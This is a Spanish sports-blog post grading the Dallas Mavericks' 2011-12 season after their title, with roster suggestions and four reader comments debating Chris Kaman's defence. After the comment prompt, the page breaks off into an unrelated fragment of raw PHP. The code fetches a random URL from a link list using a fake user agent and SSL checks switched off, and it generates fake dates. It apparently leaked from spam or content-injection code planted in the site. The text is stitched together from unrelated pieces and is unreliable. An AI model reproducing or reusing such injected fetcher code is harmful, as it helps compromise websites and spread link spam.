Dallas Mavericks: Suspenso

17 de July de 2012 por TheDeerHunter

Confieso que hasta el último momento he mantenido dudas respecto a la evaluación de la temporada de los Mavs. El final del análisis de principio de curso ha decidido la cuestión. “Hasta que alguien diga lo contrario ellos son el rival a batir”, decíamos. Definitivamente no lo han sido en ningún momento.

Tras catar el sabor de la gloria no es fácil digerir cualquier otro sucedáneo. El proyecto campeón ya fue casi una anomalía. Un grupo de veteranos en declive natural, ilustres desheredados del anillo, que se ponían de acuerdo en un “ahora o nunca” para alcanzar el nivel colectivo más brillante de sus carreras. Después a sustituir el pack Chandler, Barea, Butler, Stevenson, Stojakovic… casi nada. Soy de la opinión que hay poco que reprochar a la franquicia en la salida de estos. Todo tiene un límite, incluso el pastizal de Cuban y la situación salarial no era para soportar toda subida a la parra. Si queréis, visto lo visto, podríamos haber considerado imprescindible a Tyson Chandler tirando la casa por la ventana. ¿Hubiera cambiado algo con esos 14 kilos/año? Ni idea.

El caso es que con la llegada de Vince Carter (tras el fugaz paso de Rudy), Delonte West más el regalito final de Lamar Odom y manteniendo la columna vertebral del anillo, la situación no debía ser tan dramática. No debería serlo, digo, si alguno de ellos hubiera sido la remota sombra de lo que fue. No sabría decir si esto hay que apuntárselo al debe de los responsables técnicos de la franquicia o individualmente a la (escasa) profesionalidad de cada jugador. El caso es que, añadiendo a Yi Jianlian al tema, no se puede hablar de refuerzos este curso.

A todo ello, añadiendo un año más a su veterana vanguardia y descontando un punto de hambre menos en la temporada post-anillo, tenemos una regular discreta a todos los niveles y un cruce con Oklahoma en primera ronda. La diferencia de nivel entre el año pasado y éste se pone especialmente de manifiesto en esta eliminatoria. Una barrida excesivamente dolorosa como para terminar dando por buena la campaña y un único horizonte de reconstrucción más profunda todavía. ¿Cuántos campeones quedarán el año que viene?

Lo mejor: Que con todo aún alcanzaron la postemporada en el siempre difícil Oeste y que a la hora de la verdad trataron de dar la cara. Además, la franquicia aún conserva capacidad para mutar competitivamente de un año a otro alrededor de Dirk Nowitzki. Las incorporaciones van en buena dirección.

Lo peor: No puede ser agradable pasar de campeones a barridos en primera ronda. El caso Odom. La mediocridad global del curso. El decrépito rendimiento de algunas viejas glorias. La salida por la puerta de atrás de la mayoría.

Jugando a GM:

A estas alturas jugamos con gran parte del pescado vendido. Se mantiene obviamente a Nowitzki y se ha incorporado a Kaman, Brand y Collison. Se amnistía a Haywood (que ya era hora) por lo que quedan con bastante margen para moverse todavía.

– Parece que terminarán fichando a OJ Mayo. Sería una interesante incorporación siempre que termine explotando y acercándose a lo que alguna vez apuntó ser.

– Si el movimiento se confirma hay un exceso de escoltas en la plantilla. El propio Mayo, Vince, Dahntay, Beaubois, Dominique Jones y un único base “puro” en Darren Collison. Deberían corregir este desequilibrio.

– Un 3 suplente bueno, bonito y barato no les iría tampoco mal.

Comenta

4 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    jejej, su historia me suena y no se por qué… muchos escoltas y ningún alero fiable. Problema de muchísimas franquicias. Qué jodido se hace encontrar un alero hoy en día… pues bueno, yo les daría el aprobado porque si empezamos a suspender a todos los que se cruzaron con los Thunder… eran imbatibles este año, salvo por Lebron en modo Dios… no obstante, quizás les hicieron un favor encontrándoselos tan pronto para que no se vieran sus carencias,, porque llegaban como el equipo menos fiable del Oeste a los playoffs… así que mejor te echa un gran equipo y así ya tienes excusa. El desmantelamiento de la plantilla fue obvio en el pasado verano, Stojakovic, Barea, Chandler, Butler, Stevenson…. y todavía sigue este año con Jason Kidd. Lo bueno es que alrededor de Nowitzki está chupado reconstruir y volver a optar otra vez a algo gordo, como bien dices. Con Kaman se entenderá bien, ya lo demostraron en el pasado Eurobasket de Lituania. Kaman pone la defensa y los rebotes, además del juego de espaldas al poste bajo y los pases, y Dirk hace todo lo demás: movilidad por todo el arco, capacidad para sacar a su par muy lejos, amenaza exterior… para mí congeniarán muy bien. Luego Shawn Marion ahí está, ahí sigue como fiel escudero, y de pequeñitos quizá no sea tan necesario ir a por Calde y se le puede dar la manija a Dominique Jones (por qué no?). Beabuois puede convertirse en el nuevo Jason Terry y realmente como dices ya está todo el pescao vendido. A lo mejor podrían intentar un traspaso por algún escolta que les sobra a cambio de un suplente para Marion o un centro tipo Mohammed o algo así…. y poco más. Aunque supongo que Cuban habrá hecho una oferta por Rashard Lewis. Si no lo ha hecho es para colgarlo…

      Citar

  2. MagicJohnson32 dice:
    #2

    “Kaman pone la defensa”. Sancho, eres de un cachondo… xD

      Citar

  3. Vader dice:
    #3

    MagicJohnson32:
    “Kaman pone la defensa”. Sancho, eres de un cachondo… xD

    Jajaja si la verdad es que yo también he levantado una ceja al leerlo XD

      Citar

  4. Sancho88 dice:
    #4

    macho, tenéis una tendencia a infravalorar la defensa de los jugadores europeos que yo lo flipo… pues sí, al menos en la selección alemana ese tío defendía, igual que Calde con España, Prigioni con el Tau… pero no, aquí siempre los blancos no defienden una mierda. Yo sigo en las mías

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>